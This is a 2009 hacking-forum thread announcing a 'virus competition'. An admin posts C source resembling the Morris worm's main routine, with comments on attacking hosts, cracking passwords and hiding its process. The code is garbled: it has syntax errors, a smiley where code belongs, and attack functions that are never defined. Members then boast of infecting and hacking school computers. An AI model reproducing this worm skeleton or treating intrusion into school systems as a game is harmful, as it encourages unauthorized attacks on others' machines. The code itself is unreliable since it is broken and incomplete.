H-Area
Welcome in H-Area.tk.If you are already a member press log in...If you are a visitor the press sign up to join our community..Anyway have fun...!!!...
H-Area
Welcome in H-Area.tk.If you are already a member press log in...If you are a visitor the press sign up to join our community..Anyway have fun...!!!...
H-Area
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Learn the hacks you always wanted to learn and downlaod all the programs you need
 
PortalHomeSearchLatest imagesRegisterLog in
Latest News and Posts:Post your ideas to improve our community.
Latest member:socomguy1

 

 Virus comp.

Go down 
5 posters
AuthorMessage
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Virus comp.   Virus comp. EmptySun Sep 13, 2009 11:25 am

This is my competition. Who ever makes the best and/ or funniest virus will be the winner. The Prize will remain secret till winner is chosen, dont try to rip them from someone else. mine will be posted soon, but is not in the competition.Shall it begin.
Back to top Go down
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptySun Sep 13, 2009 2:02 pm

[SOURCE CODE]

#include

#include

#include

#include



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

int argc;

char *argv[];



{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}

else {

/* check for 1l.c in argument list */

if (!strncmp(argv([n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n];

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}



}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}



int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (;Wink {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */

exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}



[Worm.doc yes i know there are many out there but this one is different, cross reference if you doubt meh]
Back to top Go down
InfoWizard
Admin
InfoWizard


Posts : 63
Join date : 2009-08-12
Age : 34
Location : Greece

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptySun Sep 13, 2009 3:19 pm

and who is the who will test them?????lol
Back to top Go down
https://h-area.forumotion.com
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyMon Sep 14, 2009 6:49 am

i can with a shity computer or school computer
Back to top Go down
InfoWizard
Admin
InfoWizard


Posts : 63
Join date : 2009-08-12
Age : 34
Location : Greece

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyMon Sep 14, 2009 6:18 pm

I like putting viruses to school computers...Thats evil but what can I do???... Razz
Back to top Go down
https://h-area.forumotion.com
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyTue Sep 15, 2009 10:20 am

lol i just hacked a school computer yesterday
Back to top Go down
PsyRem




Posts : 8
Join date : 2009-09-10
Age : 33
Location : Australia

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyWed Sep 16, 2009 7:31 pm

Yes.
Back to top Go down
InfoWizard
Admin
InfoWizard


Posts : 63
Join date : 2009-08-12
Age : 34
Location : Greece

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyWed Sep 16, 2009 7:42 pm

JacobVengeance wrote:
lol i just hacked a school computer yesterday

from your house????
Back to top Go down
https://h-area.forumotion.com
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyThu Sep 17, 2009 3:58 am

nope from there computer lab
Back to top Go down
jezza.boi
Moderator
Moderator
jezza.boi


Posts : 191
Join date : 2009-08-23
Location : australia

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyMon Sep 21, 2009 9:48 am

lol good old JV you and your computer hacking... not saying its bad lol well it is but you get the picture Very Happy
Back to top Go down
JacobVengeance
Admin
JacobVengeance


Posts : 228
Join date : 2009-08-23
Age : 33
Location : UnderWorld

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyMon Sep 21, 2009 9:59 am

lol
Back to top Go down
Maka-chan

Maka-chan


Posts : 61
Join date : 2009-09-14
Age : 35
Location : okinawa , japan

Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. EmptyFri Sep 25, 2009 4:42 pm

lol XD, wait lemme think of somthing gonna join 2 XD
Back to top Go down
Sponsored content





Virus comp. Empty
PostSubject: Re: Virus comp.   Virus comp. Empty

Back to top Go down
 
Virus comp.
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
H-Area :: Computers :: hacks tips and tricks for Windows-
Jump to: